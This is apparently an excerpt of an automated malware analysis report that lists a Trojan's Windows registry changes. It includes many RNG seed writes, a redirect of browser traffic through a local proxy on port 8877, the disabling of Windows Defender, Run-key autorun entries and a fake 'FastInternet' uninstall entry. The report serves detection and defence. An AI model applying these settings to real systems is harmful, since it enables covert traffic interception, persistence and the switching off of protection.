The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "65 53 E3 06 EB AC E9 4D FB 04 BF 7E B7 88 0F 54"

The process taskkill.exe:1228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 B9 7F EA 7A 3A 77 DC D1 C0 29 88 9C B2 6D EB"

The process taskkill.exe:2192 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AF 35 18 0E EF DA 67 89 B3 C0 6C 8E 01 78 4B C8"

The process taskkill.exe:3000 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "80 5A 41 41 3F 64 60 06 8E 00 22 C2 65 36 55 FA"

The process taskkill.exe:3168 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC 13 E4 AA 47 02 F9 5E BB 1B 77 39 FB 9B 72 F4"

The process taskkill.exe:172 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 61 4D 57 7E 2A 31 86 E9 15 AC 6F 1F 30 48 89"

The process taskkill.exe:3452 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C9 79 7C 6B AB 71 7E 5C 59 4E C3 0F 1B E6 78 54"

The process taskkill.exe:484 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AF 40 56 44 14 5A 17 66 A6 60 C1 B2 91 E1 8E 46"

The process taskkill.exe:2056 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "07 3F 5D D9 01 D8 95 6C DD 7B F8 3C 27 D3 36 11"

The process taskkill.exe:2564 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "24 3F 0A 14 59 DC 1C D9 A0 EF 7E A1 1B 10 F2 79"

The process taskkill.exe:3012 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E0 3B 2B D9 08 FD EE 14 E7 18 8F 59 C2 FD 9F DC"

The process taskkill.exe:2368 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BD D4 CD B9 2D 40 9C 62 0E A3 4B AC 04 52 FA 90"

The process taskkill.exe:3892 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "50 C7 F9 99 43 0B 4F F7 78 78 BE 8A 2E 89 8A D7"

The process taskkill.exe:2680 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "68 23 EB 6A 22 9C D3 76 96 67 A7 A9 C0 9A A7 16"

The process taskkill.exe:3080 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A8 45 E5 48 3D B5 47 66 5E CE 34 62 DF CE 05 B0"

The process taskkill.exe:2116 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2E CA D4 8A 86 E8 84 02 58 AD D9 58 0B 65 2E 20"

The process taskkill.exe:3600 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AE 69 68 D7 2D 5D 7D A5 FE D0 43 E4 28 C5 66 30"

The process taskkill.exe:2812 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AE 4E FA FA 44 F5 8B 54 5E 69 A2 AC 4A 5E FE FB"

The process taskkill.exe:3876 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B B1 F0 59 BC C1 81 6F 89 42 4E DB 74 66 A1 9E"

The process taskkill.exe:3524 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 E6 7E D9 7A 5B 65 38 B0 9C A9 A9 01 D2 29 37"

The process taskkill.exe:3076 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "99 C3 8F 07 E7 52 8D 5C A5 C2 F0 FD 61 7F 81 86"

The process taskkill.exe:2184 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B9 DF 74 2D AA E8 32 9A 7D 26 27 E7 9A 6C 73 E9"

The process taskkill.exe:220 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "34 73 15 41 98 1E 4A A9 6E 47 53 F0 A1 65 75 72"

The process taskkill.exe:2216 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CE 47 F8 A2 90 45 D9 EF 31 BA 5C 45 E1 6E 10 50"

The process taskkill.exe:3200 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "75 1D E7 3F AD 7A 50 35 1E D6 52 25 0E 2D 61 B2"

The process taskkill.exe:2896 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "16 20 CE 45 FE A4 BA 0D 75 76 D9 79 AD F9 EA D4"

The process taskkill.exe:2892 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 29 C3 3F DF 4C 5B 89 C1 EE 3E 8A 90 38 FD 14"

The process taskkill.exe:3500 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9D 3C 8F B0 AF 1C 25 49 96 89 54 1D 57 AB B4 81"

The process taskkill.exe:3964 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8B 3A DB D3 52 A5 31 F7 AD 1F 9E 20 DB 1A F7 04"

The process taskkill.exe:2108 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "73 89 63 8C 0C D7 24 E2 53 A6 99 0B 38 A8 58 9A"

The process taskkill.exe:2692 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "65 F5 1D 9E EB 02 30 CA DA 49 BC 6D 3A B9 C8 4F"

The process taskkill.exe:2104 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DB 89 24 75 16 83 0B 00 8A 6B 62 76 A1 29 68 26"

The process taskkill.exe:2860 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7B 3A DB CA 16 CE D4 3F CE EC 85 E4 53 6A 06 3F"

The process taskkill.exe:3868 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 3E BE 4F 5C 27 5A 0C 6A E2 33 41 2F E8 BE E4"

The process taskkill.exe:3900 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA 24 A2 EE 36 3E 55 1A 42 D8 4A C7 E5 FC 79 A8"

The process taskkill.exe:3636 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "09 54 54 16 72 89 7D 80 16 E8 98 CD 62 5E F8 30"

The process taskkill.exe:2636 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 F9 78 DF B3 04 22 54 0E 1F 22 FB EE 12 F3 F2"

The process taskkill.exe:3632 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA E7 7D B7 B7 DD E6 C1 40 06 1A C0 6B BB 65 A0"

The process taskkill.exe:2436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C0 0F 84 EB FA 48 48 F4 6D 99 43 3A 69 EE BC 20"

The process taskkill.exe:3060 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A 9D 9C 7F B2 24 7F F0 81 F3 7C E4 8F B1 AC 43"

The process taskkill.exe:236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 15 44 60 63 30 4C A5 1A 39 C1 CF 80 F8 B4 AD"

The process taskkill.exe:4008 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1A 60 C7 D7 FF 7A A8 E7 A1 60 96 35 A9 4C C7 C3"

The process taskkill.exe:2340 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "27 42 D6 DF 35 0C 03 EF DC D5 10 72 12 D0 4E C7"

The process taskkill.exe:1616 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8B 11 D3 E2 D5 64 60 2F 29 0E 4D B2 F3 C3 26 83"

The process taskkill.exe:3432 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C5 E7 80 40 1B D6 1B DE C0 AE 6C 77 DB D6 1F F5"

The process taskkill.exe:4004 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3E 68 1F 9A 80 5A 22 B7 59 BA 78 C3 1E CC A3 A4"

The process taskkill.exe:3928 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "03 E0 41 B1 05 21 D5 5B C2 56 1C 98 90 94 83 76"

The process taskkill.exe:2744 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E3 70 45 C6 38 79 BA B7 AE 9D A4 51 E9 3B A8 33"

The process taskkill.exe:1560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 29 5D 8B EF AD CC 43 4C 9B FE C4 E7 B2 FE A7"

The process taskkill.exe:2748 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1A BE CD F9 A3 3A 46 13 6F D6 73 46 3C 67 D2 D4"

The process taskkill.exe:2504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6B 78 51 CD F6 5D 3A FD FE 1A A8 43 EE D8 A3 60"

The process taskkill.exe:1564 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E 7E B4 90 2E 1C C1 EA 01 14 C2 44 D9 94 D1 02"

The process taskkill.exe:3624 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A2 EF DA 05 E8 93 09 FB 84 E5 59 B8 A2 15 16 6C"

The process taskkill.exe:2728 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 06 53 53 90 05 85 29 B2 76 BA F5 79 00 E4 B9"

The process taskkill.exe:3356 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE 12 7C E8 10 75 72 9C 19 E6 D6 7B A5 54 70 6D"

The process taskkill.exe:3932 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "76 FE 41 C0 7B 44 66 0A 88 BB E2 1C 40 75 96 CC"

The process taskkill.exe:3228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B F9 73 9D 0C 7D 9C 59 45 13 36 A3 24 D7 AB 4F"

The process taskkill.exe:2336 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AC CB D9 D2 E4 C2 C2 92 1F 2B 22 9D 12 13 77 8F"

The process taskkill.exe:3116 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B5 DE AA 95 4D E3 98 13 83 4F F6 A5 7B 09 A5 B5"

The process taskkill.exe:3788 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD 62 78 DD E7 3A 69 00 D7 2D 45 C9 55 6A E5 E0"

The process taskkill.exe:3548 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 86 44 C5 01 F2 CC 33 BA 91 A5 92 24 CA EE 25"

The process taskkill.exe:2084 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "10 0F 77 3D B9 6B 04 53 7B 32 2A B9 5A 32 CA 48"

The process taskkill.exe:2224 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C C1 F9 18 E3 67 AF 71 62 6B 1A EA B7 47 51 96"

The process taskkill.exe:1764 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2A 4E F4 22 5B E3 D6 F6 37 6D C9 8E 38 D5 27 F3"

The process internetport3.exe:1088 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 03 00 00 00 28 00 00 00"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\internetport3\DEBUG]
"Trace Level" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 03 00 00 00 03 00 00 00 28 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877;"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 7F B8 61 3F 86 24 FD 7F FB 4B BB 2F B8 F0 75"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\FiddlerCore\Dynamic]
"Attached" = "1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\internetport3\DEBUG]
"Trace Level"

The process %original file name%.exe:348 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation" = "Pn"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 03 00 00 00 29 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FastIn]
"UninstallString" = "%Program Files%\FastInternet\dotuninstall.exe"

[HKLM\SOFTWARE\dingdongde]
"dingdongde" = "ok"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Policies\Microsoft\Windows Defender]
"DisableAntiSpyware" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\Control Panel]
"proxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FastIn]
"DisplayName" = "FastInternet"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"proxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxySettingsPerUser" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer" = "http=127.0.0.1:8877;https=127.0.0.1:8877"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "19 86 45 EB 66 3E C8 A8 2B E6 09 61 6D D9 65 B4"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation" = "Pn"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\FastIn]
"Publisher" = "Dotdo"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKCU\Software\Policies\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride" = "<-loopback>"

[HKCU\Software\Microsoft\Internet Explorer\Main]
"Isolation64Bit" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"interpee" = "C:\a\internetport3.exe"

"dutoauto" = "C:\a\wincheckfe.exe"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
